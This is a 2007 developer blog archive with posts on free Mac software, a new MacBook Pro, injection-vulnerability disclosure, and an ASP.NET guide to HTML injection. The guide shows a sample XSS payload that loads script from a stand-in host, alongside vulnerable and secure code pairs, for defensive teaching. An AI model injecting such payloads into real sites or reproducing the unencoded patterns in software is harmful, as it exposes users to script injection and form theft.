Archive for December, 2007

Mac freebies for Christmas

MouseWarp

Spaces is new in Leopard bringing virtual desktops to the masses. Leopard gives you a number of ways to switch between spaces including a menu-item drop down and configurable keyboard shortcuts.

To move a window to another space you drag it to the edge of the screen and wait a moment but curiously you can’t use this great technique without a window to switch!

MouseWarp adds that missing feature and provides configurable delay, an optional keyboard modifier to activate it and the choice of whether the mouse stays where it was or flips to the opposing edge on the new space.

BitRocket

I’ve tried and recommended a number of BitTorrent programs in previous Mac software posts but BitRocket sports a great modern Mac look. The user interface tends to get a bit confused wen switching around a bit but being open source this could be fixed quite promptly.

Update: I can’t recommend this program whilst it crashes so often, check out the alternatives Jane suggests in the comments.

LiteIcon

Tools to replace the Mac’s choice of system icons are surely only going to get more popular with Leopard’s annoying almost-identical watermarked folders. Whilst LiteIcon isn’t quite as slick as the commercial app CandyBar it is $29 cheaper and still lets you use the multitude of pre-made iContainer packs from the likes of IconFactory.

Think

Are you one of those people that get distracted by other apps on the screen? Me too, which is why I now use Spaces but Think is an alternative darkens the other running applications to your taste.

Carbon Copy Cloner

If you are a Boot Camp user like myself you might want to be able to backup that Windows partition to disk somewhere and Carbon Copy Cloner comes to the rescue. This is fine for the occasional backup but I’m finding myself wanting something like Time Machine for Windows – suggestions anyone?

MacHeist

MacHeist is an odd concept to explain but starts with a couple of free apps and alternate reality game. If you can solve the missions then your name is probably Jonathan Creek but the rest of us can take tips, or combinations wholesale, from the official forums where those with more brains, resources or time have collaborated on solving it.

As you enter more combinations you unlock additional free (but non-upgradable) applications and the odd discount for a forthcoming bundle in January which you are under no obligation to buy. You can also get an extra free app for Christmas by referring a friend. Just remember to backup the downloadable installers and serial numbers as once they’re gone that’s it!

So far the apps are (and I’ll update this tomorrow when I can unwrap the other three:

WireTap Pro

WireTap Pro lets you record any sound your Mac can make – thereby effectively allowing you to rip anything you can play if you don’t mind the the degradation in quality of lossy re-compression. It also lets you record snippets from DVD’s you are watching or games you are playing for perhaps review purposes.

BitClamp

Encryption has lots of uses, not all nefarious, and BitClamp offers simple drag-and-drop encryption of your files into 256-bit AES or Serpent encryption or super-secure 448 bit BlowFish. It also offers gzip compression and the ability to bundle a Mac-only decryption program into the file.

Mouseposé

Screencasts are getting slicker by the download and now includes web-cam-in-picture and a variety of keyboard and mouse triggere effects so you can see what they are doing. Mouseposé won’t help you with the webcam bit but it can darken the rest of the screen and highlight the mouse, visually show clicks on the screen and display your keystrokes.

Runic

A free game that I haven’t yet played, sorry. The only gaming I’ve been doing of late is Guitar Hero II/III although I’m hoping to get a couple of DS games tomorrow as well as a nice backpack to store my shiny new laptop in :)

Wallet

An address-book style application for storing items such as credit card numbers and serial numbers/registration details secured with 448-bit Blowfish encryption.

Catalog

Let’s you store an index of all your media on your computer for ease of scanning. These sorts of programs made sense in the days of floppy disks and small hard drives but seem pointless to me now…

Enigmo

Weird puzzle game that bears a little resemblance to the pipe-mania style games (that also made an appearance in BioShock under the guise of ‘hacking’).

Podcast Maker

Assembles XML files to describe Podcasts with support for adding images and links. Useful because it’s free but I can’t see how anyone would have previously paid $29.95 for an interface to editing specific XML files.

Freeze Frame

Allows you to pause applications when you need the CPU back. Err, okay…

Voice Candy

Here’s a cool fun little app reminiscent of 80’s TV show Whizz Kids and later messing around on my Amiga. It basically lets you talk into your computer whereby it will adjust the waveforms so you sound different. Like a chipmunk, Darth Vader, a robot, on the telephone, on an old radio, like a bad sci-fi movie, a sore throat or a mouse. You can also record the audio for later mixing up in GarageBand. Good fun and if the next version includes configurable effects I might have to actually buy a copy.

DEVONnote

Note taking and organising application.

Hana

What appears to be a minimalist browser on top of the WebKit/Safari engine.

Billy Frontier

Space cowboy shoot-em-up game.

Monkey Lover

What appears to be monkeys fighting for their life on an American Football pitch. Not really my thing.

Sofa Control

Extends the use of your Apple Remote to applications besides iTunes and FrontRow :)

Xslimmer

Another tool to prune applications of the languages and architecture segments you do not require albeit with a much better interface than Monolingual.

Hope you have a great Christmas (or a great Tuesday if you don’t celebrate that ;-)

[)amien

Thoughts on awareness of security vulnerabilities & full disclosure

HTML, SQL and XSS injection vulnerabilities aren’t new but they are still largely ignored by developers.

My first encounter with these issues was in 1999 whilst writing an extranet e-commerce web site. Back then the ASP fix consisted of Server.HtmlEncode for all output and a Replace(“‘”, “””) for strings heading to SQL (other types headed there via CInt/CLong/CDate and I wasn’t aware of parametrised queries).

Convincing co-workers on the severity of the issue and what to do about it for several years can be a draining process when you work with such a variety of different developer personalities and projects and you would rather be spending the time on more exciting things

Over the last few months I’ve been trying hard to push the message further afield via presentations at the local user group, articles here on my blog, discussions in Redmond as well as forums and private mailing lists.

More than once I’ve had the feeling I should give it a rest in case people think I have nothing else to talk about and at a few times I’ve considered publishing a few scripts I had in my head to really show the sort of things available. Of course doing such a thing would both highlight the problem but also provide a dangerous tool to people who might use it to actually exploit sites which is a problem with full disclosure. In the end my article How dangerous is HTML injection was a much neutered version without a killer payload.

Thankfully some great people are now on the case including Rob Conery and Phil Haack who I believe in to push this from inside and Steve Sanderson who came up with an elegant prototype on how to handle this at the source.

That will be all the HTML injection posts for a while I hope for there are many other things I want to work on and write about.

[)amien

One week with a MacBook Pro 17″

It has been one week since I picked up my new MacBook Pro 17″ to replace my aging first-generation 15″ model.

My initial concern was that the size and weight would be unwieldy after 4 years of lugging around a 15″ MacBook Pro and a prior to that a Titanium PowerBook G4. The actual problem was that my trusty Samsonite Trunk & Co. backpack could not accommodate it and that I’d have to hope Santa would deliver something a little bigger. Being properly kitted up might reveal if the dimensions and weight are uncomfortable so expect an update once I’ve travelled with the beast.

MacBook Pro 17The screen is fantastic, a little brighter, and provides me with a desktop-like experience in terms of real estate thanks to the combination of the increased size and the high-definition 1920×1200 option. I had examined the glossy finish in-store and found having my face and the rest of the store glaring back at me far too distracting for real work (it might be nice for watching DVD’s in the dark I guess) and so went with the matte finish. Surprisingly it is a little more reflective than the older MBP but not overly so and it does make removing unwelcome fingerprints easier.

One problem I had with m 15″ was that heavy use of Visual Studio within Parallels wasn’t always cutting it on performance. Compilation was faster than the cheap HP/Compaq desktop I’d been using but still wasn’t snappy enough to keep my attention tightly focused ;-)

I went with top options – a 2.6GHz processor coupled with 4GB of RAM and a 7200RPM 200GB drive – to ensure maximum performance. Mac OS X and native Vista did not disappoint and felt like a speedy desktop despite Vista being 32-bit and limited to 3GB of RAM until Apple ship a 64-bit ready Boot Camp drivers and tools.

My .NET development typically takes place inside a virtual machine – previously Parallels but now evaluating VMware Fusion with its enticing dual-core and 64-bit guest OS support. Both Parallels and Fusion had similar almost-native performance in the disk and processor department on my 15″ according to Vista’s performance index and I’ve yet to rerun those (stay tuned). Whichever gets Aero/DirectX 9Ex shader support first will be my home for a while.

Battery life was a big surprise offering over 3 hours and I certainly feel less conscious of where the next power feed is coming from although that is partly due to the poor battery on my old machine being rather tired and worn.

One big disappointment is the keyboard. Firstly it is the same size as the 15″ model which leaves the extra space to the speaker grille. Whilst the speakers do sound far superior – good enough to actually listen to music on – I couldn’t help but feel a wider enter key, a second ctrl and a little f-key spacing could have gone a long way. What is more concerning is that many keys do not register if hit off-centre even by a slight amount :(

There are still some things to try:

  • Games under native Vista taking advantage of the Nvidia 8600M GT chip
  • Time Machining my MyBook Pro external drive over FireWire 800 (800 Mb/s) instead of USB2 (400 Mb/s)
  • Burning DVD performance
  • Removing DVD drive (UJ-85J FBZ8) region protection (RPC) to play my DVD collection

[)amien

5 signs your ASP.NET application may be vulnerable to HTML injection

If you don’t encode data when using any of the following methods to output to HTML your application could be compromised by unexpected HTML turning up in the page and modifying everything from formatting though to capturing and interfering with form data via remote scripts (XSS). Such vulnerabilities are incredibly dangerous.

Using MonoRail or Microsoft’s MVC does not make you automatically immune – use {! } in MonoRail’s Brail engine and the HtmlHelpers in Microsoft’s MVC to ensure correct encoding.

Just imagine post.Author contains “><script src=”http://abadsite.com”></script> after an unscrupulous user entered that into a field your application uses and it got into the database. The following typical ASP.NET techniques would leave you open.

1. You use <%= %> or <%# %> tags to output data

Example showing outputting literals with <%= %> :

// Vulnerable
<p>Posted by <%= post.Author %></p>
// Secure
<p>Posted by <%= HttpUtility.HtmlEncode(post.Author) %></p>

2. You use Response.Write

Example showing writing out attributes with Response.Write and String.Format, again post.Author could contain <script>:

// Vulnerable
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", post.Author);
// Secure
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", HttpUtility.HtmlAttributeEncode(post.Author));

3. You set HRef or Src on HtmlAnchor, HtmlImage or HtmlnputImage controls

In general the HtmlControls namespace are very well behaved with encoding but there is a bug in the code that attempts to adjust the relative url’s for href and src attributes which causes those properties to bypass encoding (I’ve reported this to Microsoft).

Example showing anchor HRef attribute abuse:

// Vulnerable
outputDiv.Controls.Add(new HtmlAnchor() { Text = "Test", HRef = post.Author } );
// Secure
outputDiv.Controls.Add(new HtmlAnchor() { Text = "Test", HRef = HttpUtility.HtmlAttributeEncode(post.Author) } );

4. You set the Text property of WebControls/WebForms

You would imagine the high-level WebForms controls would take care of encoding and you’d be wrong.

Example showing the Label control being so easily taken advantage of:

// Vulnerable
outputDiv.Controls.Add(new Label() { Text = post.Author } );
// Secure
outputDiv.Controls.Add(new Label() { Text = HttpUtility.HtmlEncode(post.Author) } );

The one exception to this is the Text property of input controls – as they put the value into an attribute and therefore call HttpUtility.HtmlAttributeEncode for you.

5. You use the LiteralControl

LiteralControl is a useful control for adding text to the output stream that doesn’t require it’s own tag. It also helpfully, and uncharacteristically, provides a useful constructor. Unfortunately it fails encode the output.

Example showing poor LiteralControl wide open:

// Vulnerable
outputDiv.Controls.Add(new LiteralControl(post.Author));
// Secure
outputDiv.Controls.Add(new LiteralControl(HttpUtility.HtmlEncode(post.Author)));
Do not:
  1. Encode data in the database – your contaminated data will be difficult to use elsewhere and will end up double-encoded
  2. Look for script on submit – you won’t catch every combination and it might prevent valid data
  3. Trap entry with client-side code – it is trivially bypassed

Just encode the output :)

[)amien
(The samples use .NET 3.5 object initializer syntax for brevity as many affected controls do not have useful constructors)